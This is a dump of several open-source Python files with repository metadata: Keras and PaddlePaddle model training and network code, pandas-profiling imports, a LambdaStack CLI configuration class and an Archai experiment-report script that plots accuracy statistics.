cs = ds.GetRasterBand(1).Checksum()
assert cs == 20976, 'did not get expected checksum'
ds = None
| 35.527508
| 205
| 0.642011
|
4a111139c64ce3e5a4be8fc36997ef32038e474e
| 2,413
|
py
|
Python
|
examples/NAS-training-containers/cifar10/RunTrial.py
|
Akado2009/katib
|
cf15cd4dbb3e61814e8054678eeee8c37411fbd1
|
[
"Apache-2.0"
] | null | null | null |
examples/NAS-training-containers/cifar10/RunTrial.py
|
Akado2009/katib
|
cf15cd4dbb3e61814e8054678eeee8c37411fbd1
|
[
"Apache-2.0"
] | null | null | null |
examples/NAS-training-containers/cifar10/RunTrial.py
|
Akado2009/katib
|
cf15cd4dbb3e61814e8054678eeee8c37411fbd1
|
[
"Apache-2.0"
] | null | null | null |
import keras
import numpy as np
from keras.datasets import cifar10
from ModelConstructor import ModelConstructor
from keras.utils import to_categorical
import argparse
import time
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='TrainingContainer')
parser.add_argument('--architecture', type=str, default="", metavar='N',
help='architecture of the neural network')
parser.add_argument('--nn_config', type=str, default="", metavar='N',
help='configurations and search space embeddings')
parser.add_argument('--num_epochs', type=int, default=10, metavar='N',
help='number of epoches that each child will be trained')
args = parser.parse_args()
arch = args.architecture.replace("\'", "\"")
print(">>> arch received by trial")
print(arch)
nn_config = args.nn_config.replace("\'", "\"")
print(">>> nn_config received by trial")
print(nn_config)
num_epochs = args.num_epochs
print(">>> num_epochs received by trial")
print(num_epochs)
print(">>> Constructing Model...")
constructor = ModelConstructor(arch, nn_config)
test_model = constructor.build_model()
print(">>> Model Constructed Successfully")
test_model.summary()
test_model.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adam(lr=1e-3, decay=1e-4),
metrics=['accuracy'])
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
print(">>> Data Loaded. Training start.")
for e in range(num_epochs):
print("\nTotal Epoch {}/{}".format(e+1, num_epochs))
history = test_model.fit(x=x_train, y=y_train,
shuffle=True, batch_size=128,
epochs=1, verbose=1,
validation_data=(x_test, y_test))
print("Training-Accuracy={}".format(history.history['acc'][-1]))
print("Training-Loss={}".format(history.history['loss'][-1]))
print("Validation-Accuracy={}".format(history.history['val_acc'][-1]))
print("Validation-Loss={}".format(history.history['val_loss'][-1]))
| 40.216667
| 81
| 0.629507
|
4a1111cc2431fa02c2ae41d051e98ccb15c96808
| 9,152
|
py
|
Python
|
PaddleCV/PaddleGAN/network/STGAN_network.py
|
FrancisLiang/models-1
|
e14d5bc1ab36d0dd11977f27cff54605bf99c945
|
[
"Apache-2.0"
] | 2
|
2021-09-13T06:48:23.000Z
|
2021-09-13T06:48:28.000Z
|
PaddleCV/PaddleGAN/network/STGAN_network.py
|
FrancisLiang/models-1
|
e14d5bc1ab36d0dd11977f27cff54605bf99c945
|
[
"Apache-2.0"
] | null | null | null |
PaddleCV/PaddleGAN/network/STGAN_network.py
|
FrancisLiang/models-1
|
e14d5bc1ab36d0dd11977f27cff54605bf99c945
|
[
"Apache-2.0"
] | 1
|
2022-02-08T06:00:34.000Z
|
2022-02-08T06:00:34.000Z
|
#copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .base_network import conv2d, deconv2d, norm_layer, linear
import paddle.fluid as fluid
import numpy as np
MAX_DIM = 64 * 16
class STGAN_model(object):
def __init__(self):
pass
def network_G(self,
input,
label_org,
label_trg,
cfg,
name="generator",
is_test=False):
_a = label_org
_b = label_trg
z = self.Genc(
input,
name=name + '_Genc',
n_layers=cfg.n_layers,
dim=cfg.g_base_dims,
is_test=is_test)
zb = self.GRU(z,
fluid.layers.elementwise_sub(_b, _a),
name=name + '_GRU',
dim=cfg.g_base_dims,
n_layers=cfg.gru_n_layers,
is_test=is_test) if cfg.use_gru else z
fake_image = self.Gdec(
zb,
fluid.layers.elementwise_sub(_b, _a),
name=name + '_Gdec',
dim=cfg.g_base_dims,
n_layers=cfg.n_layers,
is_test=is_test)
za = self.GRU(z,
fluid.layers.elementwise_sub(_a, _a),
name=name + '_GRU',
dim=cfg.g_base_dims,
n_layers=cfg.gru_n_layers,
is_test=is_test) if cfg.use_gru else z
rec_image = self.Gdec(
za,
fluid.layers.elementwise_sub(_a, _a),
name=name + '_Gdec',
dim=cfg.g_base_dims,
n_layers=cfg.n_layers,
is_test=is_test)
return fake_image, rec_image
def network_D(self, input, cfg, name="discriminator"):
return self.D(input,
n_atts=cfg.c_dim,
dim=cfg.d_base_dims,
fc_dim=cfg.d_fc_dim,
n_layers=cfg.n_layers,
name=name)
def concat(self, z, a):
"""Concatenate attribute vector on feature map axis."""
ones = fluid.layers.fill_constant_batch_size_like(
z, [-1, a.shape[1], z.shape[2], z.shape[3]], "float32", 1.0)
return fluid.layers.concat([z, ones * a], axis=1)
def Genc(self, input, dim=64, n_layers=5, name='G_enc_', is_test=False):
z = input
zs = []
for i in range(n_layers):
d = min(dim * 2**i, MAX_DIM)
z = conv2d(
z,
d,
4,
2,
padding_type='SAME',
norm="batch_norm",
activation_fn='leaky_relu',
name=name + str(i),
use_bias=False,
relufactor=0.01,
initial='kaiming',
is_test=is_test)
zs.append(z)
return zs
def GRU(self,
zs,
a,
dim=64,
n_layers=4,
inject_layers=4,
kernel_size=3,
norm=None,
pass_state='lstate',
name='G_gru_',
is_test=False):
zs_ = [zs[-1]]
state = self.concat(zs[-1], a)
for i in range(n_layers):
d = min(dim * 2**(n_layers - 1 - i), MAX_DIM)
output = self.gru_cell(
zs[n_layers - 1 - i],
state,
d,
kernel_size=kernel_size,
norm=norm,
pass_state=pass_state,
name=name + str(i),
is_test=is_test)
zs_.insert(0, output[0] + zs[n_layers - 1 - i])
if inject_layers > i:
state = self.concat(output[1], a)
else:
state = output[1]
return zs_
def Gdec(self,
zs,
a,
dim=64,
n_layers=5,
shortcut_layers=4,
inject_layers=4,
name='G_dec_',
is_test=False):
shortcut_layers = min(shortcut_layers, n_layers - 1)
inject_layers = min(inject_layers, n_layers - 1)
z = self.concat(zs[-1], a)
for i in range(n_layers):
if i < n_layers - 1:
d = min(dim * 2**(n_layers - 1 - i), MAX_DIM)
z = deconv2d(
z,
d,
4,
2,
padding_type='SAME',
name=name + str(i),
norm='batch_norm',
activation_fn='relu',
use_bias=False,
initial='kaiming',
is_test=is_test)
if shortcut_layers > i:
z = fluid.layers.concat([z, zs[n_layers - 2 - i]], axis=1)
if inject_layers > i:
z = self.concat(z, a)
else:
x = z = deconv2d(
z,
3,
4,
2,
padding_type='SAME',
name=name + str(i),
activation_fn='tanh',
use_bias=True,
initial='kaiming',
is_test=is_test)
return x
def D(self,
x,
n_atts=13,
dim=64,
fc_dim=1024,
n_layers=5,
norm='instance_norm',
name='D_'):
y = x
for i in range(n_layers):
d = min(dim * 2**i, MAX_DIM)
y = conv2d(
y,
d,
4,
2,
norm=None,
padding=1,
activation_fn='leaky_relu',
name=name + str(i),
use_bias=True,
relufactor=0.01,
initial='kaiming')
logit_gan = linear(
y,
fc_dim,
activation_fn='relu',
name=name + 'fc_adv_1',
initial='kaiming')
logit_gan = linear(
logit_gan, 1, name=name + 'fc_adv_2', initial='kaiming')
logit_att = linear(
y,
fc_dim,
activation_fn='relu',
name=name + 'fc_cls_1',
initial='kaiming')
logit_att = linear(
logit_att, n_atts, name=name + 'fc_cls_2', initial='kaiming')
return logit_gan, logit_att
def gru_cell(self,
in_data,
state,
out_channel,
kernel_size=3,
norm=None,
pass_state='lstate',
name='gru',
is_test=False):
state_ = deconv2d(
state,
out_channel,
4,
2,
padding_type='SAME',
name=name + '_deconv2d',
use_bias=True,
initial='kaiming',
is_test=is_test,
) # upsample and make `channel` identical to `out_channel`
reset_gate = conv2d(
fluid.layers.concat(
[in_data, state_], axis=1),
out_channel,
kernel_size,
norm=norm,
activation_fn='sigmoid',
padding_type='SAME',
use_bias=True,
name=name + '_reset_gate',
initial='kaiming',
is_test=is_test)
update_gate = conv2d(
fluid.layers.concat(
[in_data, state_], axis=1),
out_channel,
kernel_size,
norm=norm,
activation_fn='sigmoid',
padding_type='SAME',
use_bias=True,
name=name + '_update_gate',
initial='kaiming',
is_test=is_test)
left_state = reset_gate * state_
new_info = conv2d(
fluid.layers.concat(
[in_data, left_state], axis=1),
out_channel,
kernel_size,
norm=norm,
activation_fn='tanh',
name=name + '_info',
padding_type='SAME',
use_bias=True,
initial='kaiming',
is_test=is_test)
output = (1 - update_gate) * state_ + update_gate * new_info
if pass_state == 'output':
return output, output
elif pass_state == 'state':
return output, state_
else:
return output, left_state
| 30.814815
| 78
| 0.462194
|
4a11136f4289c07f207a3855d525855b76af85f3
| 1,087
|
py
|
Python
|
src/pandas_profiling/report/presentation/flavours/html/__init__.py
|
javiergodoy/pandas-profiling
|
0bed133520b9982263ed8cbc1af6b8f5a511bf0d
|
[
"MIT"
] | 1
|
2020-02-14T23:51:34.000Z
|
2020-02-14T23:51:34.000Z
|
src/pandas_profiling/report/presentation/flavours/html/__init__.py
|
javiergodoy/pandas-profiling
|
0bed133520b9982263ed8cbc1af6b8f5a511bf0d
|
[
"MIT"
] | null | null | null |
src/pandas_profiling/report/presentation/flavours/html/__init__.py
|
javiergodoy/pandas-profiling
|
0bed133520b9982263ed8cbc1af6b8f5a511bf0d
|
[
"MIT"
] | 1
|
2020-06-12T00:02:15.000Z
|
2020-06-12T00:02:15.000Z
|
from pandas_profiling.report.presentation.flavours.html.sequence import HTMLSequence
from pandas_profiling.report.presentation.flavours.html.table import HTMLTable
from pandas_profiling.report.presentation.flavours.html.variable import HTMLVariable
from pandas_profiling.report.presentation.flavours.html.image import HTMLImage
from pandas_profiling.report.presentation.flavours.html.frequency_table import (
HTMLFrequencyTable,
)
from pandas_profiling.report.presentation.flavours.html.frequency_table_small import (
HTMLFrequencyTableSmall,
)
from pandas_profiling.report.presentation.flavours.html.variable_info import (
HTMLVariableInfo,
)
from pandas_profiling.report.presentation.flavours.html.html import HTMLHTML
from pandas_profiling.report.presentation.flavours.html.sample import HTMLSample
from pandas_profiling.report.presentation.flavours.html.toggle_button import (
HTMLToggleButton,
)
from pandas_profiling.report.presentation.flavours.html.warnings import HTMLWarnings
from pandas_profiling.report.presentation.flavours.html.collapse import HTMLCollapse
| 51.761905
| 86
| 0.867525
|
4a11137b4027f80a9c415720fbf95c56e2a3031a
| 1,489
|
py
|
Python
|
Using Keras/Testing.py
|
abbazs/Image-Classification-by-Keras-and-Tensorflow
|
e6e763ca5711d458fecc3aaa23da4e73ea43772b
|
[
"Apache-2.0"
] | 76
|
2018-09-23T12:14:43.000Z
|
2022-03-24T16:25:47.000Z
|
Using Keras/Testing.py
|
abbazs/Image-Classification-by-Keras-and-Tensorflow
|
e6e763ca5711d458fecc3aaa23da4e73ea43772b
|
[
"Apache-2.0"
] | 11
|
2018-11-07T12:53:57.000Z
|
2022-02-09T23:56:46.000Z
|
Using Keras/Testing.py
|
abbazs/Image-Classification-by-Keras-and-Tensorflow
|
e6e763ca5711d458fecc3aaa23da4e73ea43772b
|
[
"Apache-2.0"
] | 49
|
2018-12-03T21:59:24.000Z
|
2022-03-07T13:23:45.000Z
|
import os
import numpy as np
from keras.preprocessing.image import ImageDataGenerator, load_img, img_to_array
from keras.models import Sequential, load_model
import time
start = time.time()
#Define Path
model_path = './models/model.h5'
model_weights_path = './models/weights.h5'
test_path = 'data/alien_test'
#Load the pre-trained models
model = load_model(model_path)
model.load_weights(model_weights_path)
#Define image parameters
img_width, img_height = 150, 150
#Prediction Function
def predict(file):
x = load_img(file, target_size=(img_width,img_height))
x = img_to_array(x)
x = np.expand_dims(x, axis=0)
array = model.predict(x)
result = array[0]
#print(result)
answer = np.argmax(result)
if answer == 1:
print("Predicted: chair")
elif answer == 0:
print("Predicted: Motorbikes")
elif answer == 2:
print("Predicted: soccer_ball")
return answer
#Walk the directory for every image
for i, ret in enumerate(os.walk(test_path)):
for i, filename in enumerate(ret[2]):
if filename.startswith("."):
continue
print(ret[0] + '/' + filename)
result = predict(ret[0] + '/' + filename)
print(" ")
#Calculate execution time
end = time.time()
dur = end-start
if dur<60:
print("Execution Time:",dur,"seconds")
elif dur>60 and dur<3600:
dur=dur/60
print("Execution Time:",dur,"minutes")
else:
dur=dur/(60*60)
print("Execution Time:",dur,"hours")
| 24.409836
| 81
| 0.668234
|
4a111438387acd47aae5e86b1905db6e257fd97b
| 161
|
py
|
Python
|
tests/model_control/detailed/transf_Fisher/model_control_one_enabled_Fisher_MovingAverage_Seasonal_DayOfWeek_AR.py
|
shaido987/pyaf
|
b9afd089557bed6b90b246d3712c481ae26a1957
|
[
"BSD-3-Clause"
] | 377
|
2016-10-13T20:52:44.000Z
|
2022-03-29T18:04:14.000Z
|
tests/model_control/detailed/transf_Fisher/model_control_one_enabled_Fisher_MovingAverage_Seasonal_DayOfWeek_AR.py
|
ysdede/pyaf
|
b5541b8249d5a1cfdc01f27fdfd99b6580ed680b
|
[
"BSD-3-Clause"
] | 160
|
2016-10-13T16:11:53.000Z
|
2022-03-28T04:21:34.000Z
|
tests/model_control/detailed/transf_Fisher/model_control_one_enabled_Fisher_MovingAverage_Seasonal_DayOfWeek_AR.py
|
ysdede/pyaf
|
b5541b8249d5a1cfdc01f27fdfd99b6580ed680b
|
[
"BSD-3-Clause"
] | 63
|
2017-03-09T14:51:18.000Z
|
2022-03-27T20:52:57.000Z
|
import tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Fisher'] , ['MovingAverage'] , ['Seasonal_DayOfWeek'] , ['AR'] );
| 40.25
| 88
| 0.757764
|
4a11149cf8771079bc5f43063e349b5a560f0df7
| 5,222
|
py
|
Python
|
cli/helpers/Config.py
|
lambdastack/lambdastack
|
0898cf23b490aa520b75f1bcd85be56c74cf35cf
|
[
"Apache-2.0"
] | 6
|
2021-11-29T13:14:14.000Z
|
2022-02-02T19:27:44.000Z
|
cli/helpers/Config.py
|
lambdastack/lambdastack
|
0898cf23b490aa520b75f1bcd85be56c74cf35cf
|
[
"Apache-2.0"
] | 5
|
2021-11-17T13:21:58.000Z
|
2021-11-22T16:31:08.000Z
|
cli/helpers/Config.py
|
lambdastack/lambdastack
|
0898cf23b490aa520b75f1bcd85be56c74cf35cf
|
[
"Apache-2.0"
] | 2
|
2021-10-21T17:31:36.000Z
|
2021-12-01T08:20:25.000Z
|
import os
from os.path import expanduser
LOG_TYPES = ['plain', 'json']
class InvalidLogTypeException(Exception):
pass
class Config:
class __ConfigBase:
def __init__(self):
self._docker_cli = bool(os.environ.get('LSCLI_DOCKER_SHARED_DIR',''))
self._output_dir = None
if self._docker_cli:
self._output_dir = os.path.join(os.environ.get('LSCLI_DOCKER_SHARED_DIR'), 'build')
self._log_file = 'log.log'
self._log_format = '%(asctime)s %(levelname)s %(name)s - %(message)s'
self._log_date_format = '%H:%M:%S'
self._log_count = 10
self._log_type = 'plain'
self._validate_certs = True
self._debug = 0
self._auto_approve = False
self._offline_requirements = ''
self._wait_for_pods = False
self._upgrade_components = []
self._vault_password_location = os.path.join(expanduser("~"), '.lambdastack/vault.cfg')
@property
def docker_cli(self):
return self._docker_cli
@property
def output_dir(self):
return self._output_dir
@output_dir.setter
def output_dir(self, output_dir):
if not self._docker_cli and output_dir is not None:
self._output_dir = output_dir
@property
def log_file(self):
return self._log_file
@log_file.setter
def log_file(self, log_file):
if not log_file is None:
self._log_file = log_file
@property
def log_format(self):
return self._log_format
@log_format.setter
def log_format(self, log_format):
if not log_format is None:
self._log_format = log_format
@property
def log_date_format(self):
return self._log_date_format
@log_date_format.setter
def log_date_format(self, log_date_format):
if not log_date_format is None:
self._log_date_format = log_date_format
@property
def log_count(self):
return self._log_count
@log_count.setter
def log_count(self, log_count):
if not log_count is None:
self._log_count = log_count
@property
def log_type(self):
return self._log_type
@log_type.setter
def log_type(self, log_type):
if not log_type is None:
if log_type in LOG_TYPES:
self._log_type = log_type
else:
raise InvalidLogTypeException( f'log_type "{log_type}" is not valid. Use one of: {LOG_TYPES}' )
@property
def validate_certs(self):
return self._validate_certs
@validate_certs.setter
def validate_certs(self, validate_certs):
if not validate_certs is None:
self._validate_certs = validate_certs
@property
def debug(self):
return self._debug
@debug.setter
def debug(self, debug):
if not debug is None:
self._debug = debug
@property
def auto_approve(self):
return self._auto_approve
@auto_approve.setter
def auto_approve(self, auto_approve):
if not auto_approve is None:
self._auto_approve = auto_approve
@property
def vault_password_location(self):
return self._vault_password_location
@vault_password_location.setter
def vault_password_location(self, vault_password_location):
if not vault_password_location is None:
self._vault_password_location = vault_password_location
@property
def offline_requirements(self):
return self._offline_requirements
@offline_requirements.setter
def offline_requirements(self, offline_requirements):
if not offline_requirements is None:
if not os.path.isdir(offline_requirements):
raise Exception(f'offline_requirements path "{offline_requirements}" is not a valid path.')
# To make sure Ansible copies the content of the folder the the repository host.
if not offline_requirements.endswith('/'):
offline_requirements = f'{offline_requirements}/'
self._offline_requirements = offline_requirements
@property
def wait_for_pods(self):
return self._wait_for_pods
@wait_for_pods.setter
def wait_for_pods(self, wait_for_pods):
if not wait_for_pods is None:
self._wait_for_pods = wait_for_pods
@property
def upgrade_components(self):
return self._upgrade_components
@upgrade_components.setter
def upgrade_components(self, upgrade_components):
self._upgrade_components = upgrade_components
instance = None
def __new__(cls):
if Config.instance is None:
Config.instance = Config.__ConfigBase()
return Config.instance
| 31.269461
| 115
| 0.598238
|
4a1114d6ccaaedc99a5469ee56e5dc86a9b9384f
| 15,176
|
py
|
Python
|
scripts/reports/exprep.py
|
cclauss/archai
|
a5fb8f937f7f1319e3204120803b2a045e9f768b
|
[
"MIT"
] | 1
|
2020-10-03T18:18:41.000Z
|
2020-10-03T18:18:41.000Z
|
scripts/reports/exprep.py
|
cclauss/archai
|
a5fb8f937f7f1319e3204120803b2a045e9f768b
|
[
"MIT"
] | null | null | null |
scripts/reports/exprep.py
|
cclauss/archai
|
a5fb8f937f7f1319e3204120803b2a045e9f768b
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import argparse
from typing import Dict, List, Type, Iterator, Tuple
import glob
import os
import pathlib
from collections import OrderedDict
import yaml
from inspect import getsourcefile
import re
from runstats import Statistics
import matplotlib
matplotlib.use('Agg')
import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from archai.common import utils
from archai.common.ordereddict_logger import OrderedDictLogger
import re
def main():
parser = argparse.ArgumentParser(description='Report creator')
parser.add_argument('--results-dir', '-d', type=str,
#default=r'D:\GitHubSrc\archaiphilly\phillytools\darts_baseline_20200411',
default=r'~/logdir/report_test',
help='folder with experiment results from pt')
parser.add_argument('--out-dir', '-o', type=str, default=r'~/logdir/reports',
help='folder to output reports')
args, extra_args = parser.parse_known_args()
# root dir where all results are stored
results_dir = pathlib.Path(utils.full_path(args.results_dir))
print(f'results_dir: {results_dir}')
# extract experiment name which is top level directory
exp_name = results_dir.parts[-1]
# create results dir for experiment
out_dir = utils.full_path(os.path.join(args.out_dir, exp_name))
print(f'out_dir: {out_dir}')
os.makedirs(out_dir, exist_ok=True)
# get list of all structured logs for each job
logs = {}
job_count = 0
for job_dir in results_dir.iterdir():
job_count += 1
for subdir in job_dir.iterdir():
if not subdir.is_dir():
continue
# currently we expect that each job was ExperimentRunner job which should have
# _search or _eval folders
if subdir.stem.endswith('_search'):
sub_job = 'search'
elif subdir.stem.endswith('_eval'):
sub_job = 'eval'
else:
raise RuntimeError(f'Sub directory "{subdir}" in job "{job_dir}" must '
'end with either _search or _eval which '
'should be the case if ExperimentRunner was used.')
logs_filepath = os.path.join(str(subdir), 'logs.yaml')
if os.path.isfile(logs_filepath):
fix_yaml(logs_filepath)
with open(logs_filepath, 'r') as f:
key = job_dir.name + ':' + sub_job
logs[key] = yaml.load(f, Loader=yaml.Loader)
# create list of epoch nodes having same path in the logs
grouped_logs = group_multi_runs(logs)
collated_grouped_logs = collect_epoch_nodes(grouped_logs)
summary_text, details_text = '', ''
for log_key, grouped_logs in collated_grouped_logs.items():
# for each path for epochs nodes, compute stats
for node_path, logs_epochs_nodes in grouped_logs.items():
collated_epoch_stats = get_epoch_stats(node_path, logs_epochs_nodes)
summary_text += get_summary_text(log_key, out_dir, node_path, collated_epoch_stats, len(logs_epochs_nodes))
details_text += get_details_text(log_key, out_dir, node_path, collated_epoch_stats, len(logs_epochs_nodes))
write_report('summary.md', **vars())
write_report('details.md', **vars())
def epoch_nodes(node:OrderedDict, path=[])->Iterator[Tuple[List[str], OrderedDict]]:
"""Search nodes recursively for nodes named 'epochs' and return them along with their paths"""
for k, v in node.items():
if k == 'epochs' and isinstance(v, OrderedDict) and len(v) and '0' in v:
yield path, v
elif isinstance(v, OrderedDict): # make recursive call
for p, en in epoch_nodes(v, path=path+[k]):
yield p, en
def fix_yaml(filepath:str):
# fix yaml construction recursion error because of bad lines
yaml = pathlib.Path(filepath).read_text()
bad_lines = [
r'get: !!python/object/apply:builtins.getattr',
r'- *id001',
r' - get'
]
# form pattern by joining str literals after escape by whitespace /s
# Note: don't use re.escape as it cannot be used in re.sub
pattern = r'\s+'.join([re.escape(l) for l in bad_lines])
fixed_yaml = re.sub(pattern, '', yaml)
if yaml != fixed_yaml:
backup = pathlib.Path(filepath+'.original.yaml')
assert not backup.exists(), f'Backup file {backup} should not exist'
backup.write_text(yaml)
pathlib.Path(filepath).write_text(fixed_yaml)
print(f'Yaml at {filepath} was fixed')
def remove_seed_part(log_key:str)->str:
# regex identifies seed123, seed123.4, seed_123, seed_123.4
# pattern is 'seed' followed by optional '_' followed by int or float number
pat = r'seed\_?([0-9]*[.])?[0-9]+'
return re.sub(pat, '', log_key)
def group_multi_runs(logs:Dict[str, OrderedDict])->Dict[str, List[OrderedDict]]:
result:Dict[str, List[OrderedDict]] = {}
for log_key, log in logs.items():
seed_less_key = remove_seed_part(log_key)
if seed_less_key in result:
result[seed_less_key].append(log)
else:
result[seed_less_key] = [log]
return result
def collect_epoch_nodes(grouped_logs:Dict[str, List[OrderedDict]])->Dict[str, Dict[str, List[OrderedDict]]]:
"""Make list of epoch nodes in same path in each of the logs if collate=True else
its just list of epoch nodes with jobdir and path as the key."""
collated:Dict[str, Dict[str, List[OrderedDict]]] = {}
for log_key, logs in grouped_logs.items():
collated_logs:Dict[str, List[OrderedDict]] = {}
for log in logs:
for path, epoch_node in epoch_nodes(log):
# for each path get the list where we can put epoch node
path_key = '/'.join(path)
if not path_key in collated_logs:
collated_logs[path_key] = []
v = collated_logs[path_key]
v.append(epoch_node)
collated[log_key] = collated_logs
return collated
class EpochStats:
def __init__(self) -> None:
self.start_lr = Statistics()
self.end_lr = Statistics()
self.train_fold = FoldStats()
self.val_fold = FoldStats()
def update(self, epoch_node:OrderedDict)->None:
self.start_lr.push(epoch_node['start_lr'])
if 'train' in epoch_node:
self.end_lr.push(epoch_node['train']['end_lr'])
self.train_fold.update(epoch_node['train'])
if 'val' in epoch_node:
self.val_fold.update(epoch_node['val'])
class FoldStats:
def __init__(self) -> None:
self.top1 = Statistics()
self.top5 = Statistics()
self.duration = Statistics()
self.step_time = Statistics()
def update(self, fold_node:OrderedDict)->None:
self.top1.push(fold_node['top1'])
self.top5.push(fold_node['top5'])
if 'duration' in fold_node:
self.duration.push(fold_node['duration'])
if 'step_time' in fold_node:
self.step_time.push(fold_node['step_time'])
def stat2str(stat:Statistics)->str:
if len(stat) == 0:
return '-'
s = f'{stat.mean():.4f}'
if len(stat)>1:
s += f'<sup> ± {stat.stddev():.4f}</sup>'
return s
def get_epoch_stats(node_path:str, logs_epochs_nodes:List[OrderedDict])->List[EpochStats]:
epoch_stats = []
for epochs_node in logs_epochs_nodes:
for epoch_num, epoch_node in epochs_node.items():
if not str.isnumeric(epoch_num): # each epoch key must be numeric
continue
epoch_num = int(epoch_num)
if epoch_num >= len(epoch_stats):
epoch_stats.append(EpochStats())
epoch_stat = epoch_stats[epoch_num]
epoch_stat.update(epoch_node)
return epoch_stats
def get_valid_filename(s):
s = str(s).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
def get_summary_text(log_key:str, out_dir:str, node_path:str, epoch_stats:List[EpochStats], seed_runs:int)->str:
lines = ['','']
lines.append(f'## Run: {log_key}\n')
lines.append(f'### Metric Type: {node_path}\n')
lines.append(f'Number of epochs: {len(epoch_stats)}\n')
lines.append(f'Number of seeds: {seed_runs}\n')
lines.append('\n')
plot_filename = get_valid_filename(node_path)+'.png'
plot_filepath = os.path.join(out_dir, plot_filename)
plot_epochs(epoch_stats, plot_filepath)
lines.append('')
train_duration = Statistics()
for epoch_stat in epoch_stats:
train_duration += epoch_stat.train_fold.duration
lines.append(f'')
lines.append(f'Train epoch time: {stat2str(train_duration)}')
lines.append('')
milestones = [35, 200, 600, 1500]
for milestone in milestones:
if len(epoch_stats) >= milestone:
lines.append(f'{stat2str(epoch_stats[milestone-1].val_fold.top1)} val top1 @ {milestone} epochs\n')
# last epoch
if not len(epoch_stats) in milestones:
lines.append(f'{stat2str(epoch_stats[-1].val_fold.top1)} val top1 @ {len(epoch_stats)} epochs\n')
return '\n'.join(lines)
def get_details_text(log_key:str, out_dir:str, node_path:str, epoch_stats:List[EpochStats], seed_runs:int)->str:
lines = ['','']
lines.append(f'## Run: {log_key}\n')
lines.append(f'### Metric Type: {node_path}\n')
lines.append(f'Number of seeds: {seed_runs}\n')
lines.append('|Epoch |Val Top1 |Val Top5 |Train Top1 |Train Top5 |Train Duration |Val Duration |Train Step Time |Val Step Time |StartLR |EndLR |')
lines.append('|---|---|---|---|---|---|---|---|---|---|---|')
for i, epoch_stat in enumerate(epoch_stats):
line = '|'
line += str(i) + '|'
line += stat2str(epoch_stat.val_fold.top1) + '|'
line += stat2str(epoch_stat.val_fold.top5) + '|'
line += stat2str(epoch_stat.train_fold.top1) + '|'
line += stat2str(epoch_stat.train_fold.top5) + '|'
line += stat2str(epoch_stat.train_fold.duration) + '|'
line += stat2str(epoch_stat.val_fold.duration) + '|'
line += stat2str(epoch_stat.train_fold.step_time) + '|'
line += stat2str(epoch_stat.val_fold.step_time) + '|'
line += stat2str(epoch_stat.start_lr) + '|'
line += stat2str(epoch_stat.end_lr) + '|'
lines.append(line)
return '\n'.join(lines)
def plot_epochs(epoch_stats:List[EpochStats], filepath:str):
plt.ioff()
plt.clf()
fig, ax = plt.subplots()
clrs = sns.color_palette("husl", 5)
with sns.axes_style("darkgrid"):
metrics = []
val_top1_means = [es.val_fold.top1.mean() if len(es.val_fold.top1)>0 else 0 for es in epoch_stats]
val_top1_std = [es.val_fold.top1.stddev() if len(es.val_fold.top1)>1 else 0 for es in epoch_stats]
val_top1_min = [es.val_fold.top1.minimum() if len(es.val_fold.top1)>0 else 0 for es in epoch_stats]
val_top1_max = [es.val_fold.top1.maximum() if len(es.val_fold.top1)>0 else 0 for es in epoch_stats]
metrics.append((val_top1_means, val_top1_std, 'val_top1', val_top1_min, val_top1_max))
val_top5_means = [es.val_fold.top5.mean() for es in epoch_stats]
val_top5_std = [es.val_fold.top5.stddev() if len(es.val_fold.top5)>1 else 0 for es in epoch_stats]
val_top5_min = [es.val_fold.top5.minimum() if len(es.val_fold.top5)>0 else 0 for es in epoch_stats]
val_top5_max = [es.val_fold.top5.maximum() if len(es.val_fold.top5)>0 else 0 for es in epoch_stats]
metrics.append((val_top5_means, val_top5_std, 'val_top5', val_top5_min, val_top5_max))
train_top1_means = [es.train_fold.top1.mean() for es in epoch_stats]
train_top1_std = [es.train_fold.top1.stddev() if len(es.train_fold.top1)>1 else 0 for es in epoch_stats]
train_top1_min = [es.train_fold.top1.minimum() if len(es.train_fold.top1)>0 else 0 for es in epoch_stats]
train_top1_max = [es.train_fold.top1.maximum() if len(es.train_fold.top1)>0 else 0 for es in epoch_stats]
metrics.append((train_top1_means, train_top1_std, 'train_top1', train_top1_min, train_top1_max))
train_top5_means = [es.train_fold.top5.mean() for es in epoch_stats]
train_top5_std = [es.train_fold.top5.stddev() if len(es.train_fold.top5)>1 else 0 for es in epoch_stats]
train_top5_min = [es.train_fold.top1.minimum() if len(es.train_fold.top5)>0 else 0 for es in epoch_stats]
train_top5_max = [es.train_fold.top1.maximum() if len(es.train_fold.top5)>0 else 0 for es in epoch_stats]
metrics.append((train_top5_means, train_top5_std, 'train_top5', train_top5_min, train_top5_max))
for i, metric in enumerate(metrics):
ax.plot(range(len(metric[0])), metric[0], label=metric[2], c=clrs[i])
ax.fill_between(range(len(metric[0])), np.subtract(metric[0], metric[1]),
np.add(metric[0], metric[1]),
alpha=0.5, facecolor=clrs[i])
ax.fill_between(range(len(metric[0])), metric[3],
metric[4],
alpha=0.1, facecolor=clrs[i])
ax.set_xlabel('Epoch')
ax.set_ylabel('Accuracy')
ax.set_title('Accuracy Metrics')
ax.legend()
ax.grid('on')
# add more ticks
#ax.set_xticks(np.arange(max([len(m) for m in metrics])))
# remove tick marks
# ax.xaxis.set_tick_params(size=0)
# ax.yaxis.set_tick_params(size=0)
# change the color of the top and right spines to opaque gray
# ax.spines['right'].set_color((.8,.8,.8))
# ax.spines['top'].set_color((.8,.8,.8))
# tweak the axis labels
xlab = ax.xaxis.get_label()
ylab = ax.yaxis.get_label()
